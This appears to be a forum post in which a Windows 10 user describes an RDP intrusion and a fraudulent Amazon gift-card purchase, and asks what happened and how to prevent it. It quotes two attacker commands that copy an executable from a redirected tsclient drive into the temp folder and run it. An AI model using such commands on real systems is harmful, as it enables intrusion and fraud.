A few days ago I was welcomed with a command screen showing that someone used the windows internal tsclient to copy a file into my tmp directory and run it.I had thought that I had TS turned off. Whatever this .exe is was used to RDP into my computer a couple days later in the middle of the night to pull up my own browser and order a digital gift card from Amazon, which I'm never logged out of.
>copy /y \tsclient\g\sysscan.exe %tmp%\rsd.exe
>%tmp%\rsd.exe 775157 0 1
I even had the RDP port changed from default and it is forwarded to the static IP of this machine, which is always on. How did they first gain TS access if I had left it on? Is it really that easy? Second RDP access? Easy enough if I dont use a MS live account and they were able to retrieve my NT pw? Or did they insert their own credentials?
Also does anyone know what this rsd.exe is or what it does so I can try and track down what was changed. I have not made an image backup in probably 6 months and really, really would not like to go back that far. Also what can I do to prevent this again? I know that I should make sure TS is turned off and probably have certs for the RDP, but is there anything else?
Win10Pro x64. Webroot AV and "firewall", Win10 Firewall